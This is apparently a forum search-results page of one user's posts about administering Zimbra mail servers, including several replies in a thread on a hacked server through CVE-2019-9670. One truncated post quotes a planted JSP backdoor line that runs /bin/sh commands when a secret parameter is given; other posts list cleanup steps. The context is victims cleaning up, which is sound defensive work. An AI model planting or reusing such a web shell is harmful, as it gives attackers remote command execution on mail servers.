As stated in the topic: I need to remove /opt/zimbra/log/zmmailboxd.pid after a zmcontroll restart why?
It happens every now and then when I create a backup of my installation.
Backupscript rsyncs, stop zimbra, rsync, start zimbra (here is the problem).
Any ideas? Thanks!
Search found 10 matches
- Tue Jun 15, 2021 12:55 pm
- Forum: Administrators
- Topic: I need to remove /opt/zimbra/log/zmmailboxd.pid after a restart why?
- Replies: 0
- Views: 1939
- Sun Apr 04, 2021 3:12 pm
- Forum: Administrators
- Topic: Another Letsencrypt method
- Replies: 154
- Views: 531340
Re: Another Letsencrypt method
Hello and thanks for a great thread! Im running a old 8.6 and would like to install a lets encrypt cert... So... I used getssl to generate those files: -rw------- 1 root root 5768 apr 4 15:55 chain.crt -rw------- 1 root root 6076 apr 4 16:21 fullchain.crt -rw------- 1 root root 3448 apr 4 15:41 mym...
- Sun Apr 04, 2021 2:47 pm
- Forum: Administrators
- Topic: Another Letsencrypt method
- Replies: 154
- Views: 531340
Re: Another Letsencrypt method
Hello and thanks for a great thread! Im running a old 8.6 and would like to install a lets encrypt cert... So... I used getssl to generate those files: -rw------- 1 root root 5768 apr 4 15:55 chain.crt -rw------- 1 root root 6076 apr 4 16:21 fullchain.crt -rw------- 1 root root 3448 apr 4 15:41 myma...
- Thu Jun 06, 2019 6:59 pm
- Forum: Installation and Upgrade
- Topic: How does zimbra use DNS, Split DNS, Local IP
- Replies: 0
- Views: 2530
How does zimbra use DNS, Split DNS, Local IP
Hi all Zimbras! Im going to install a 8.8 on a Ubuntu 18. First google-hit was this tutorial: https://computingforgeeks.com/how-to-install-zimbra-collaboration-on-ubuntu-18-04-lts/ States I need a DNS-server. Checking docs and searching forum: https://wiki.zimbra.com/wiki/Split_DNS Saying: "Dep...
- Fri May 31, 2019 12:24 pm
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631550
Re: CVE-2019-9670 being actively exploited
Help me with this plz : /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh",&quo...
- Thu May 30, 2019 1:34 pm
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631550
Re: CVE-2019-9670 being actively exploited
Hi all!
I have a old 5.0 installation running on an old hp-server, dont ask me why. Are the 5.0 affected by the virus?
Anyone knows?
Thanks!
I have a old 5.0 installation running on an old hp-server, dont ask me why. Are the 5.0 affected by the virus?
Anyone knows?
Thanks!
- Tue May 28, 2019 4:05 pm
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631550
Re: CVE-2019-9670 being actively exploited
Has anyone with recurring infections checked if the attacker uploaded a key to /opt/zimbra/.ssh/authorized_keys ? Or if there are remote ssh logins for the zimbra user? Yes, apparently the chinese guys takes control of zimbra user, they load a tons of script en /tmp/ and /opt/zimbra/log/ some are h...
- Tue May 28, 2019 10:37 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631550
Re: CVE-2019-9670 being actively exploited
exploit, just remove themelby wrote:This is a zimbra files or exploit ?zimbraxtc wrote:Thanks!Drake wrote:Hello guys
Dont miss:
/opt/zimbra/log/zmswatch and zmswatch.sh
My crontab is empty. How can i regenerate it?
might be a differnt path to your crontab, mine is /var/spool/cron/crontabs/zimbra
- Tue May 28, 2019 9:15 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631550
Re: CVE-2019-9670 being actively exploited
Thanks!Drake wrote:Hello guys
Dont miss:
/opt/zimbra/log/zmswatch and zmswatch.sh
- Tue May 28, 2019 8:18 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631550
Re: CVE-2019-9670 being actively exploited
Hello all! I have the same issue on a 8.6 Ubuntu. - added patch - clean /var/spool/cron/crontabs/zimbra (line at the end) - clean /opt/zimbra/log/zmswatch and zmswatch.sh - removed added email-accounts (only one) - changed the admin-pass for zimbra-user - cant find any strange .jsp-files. - clean /o...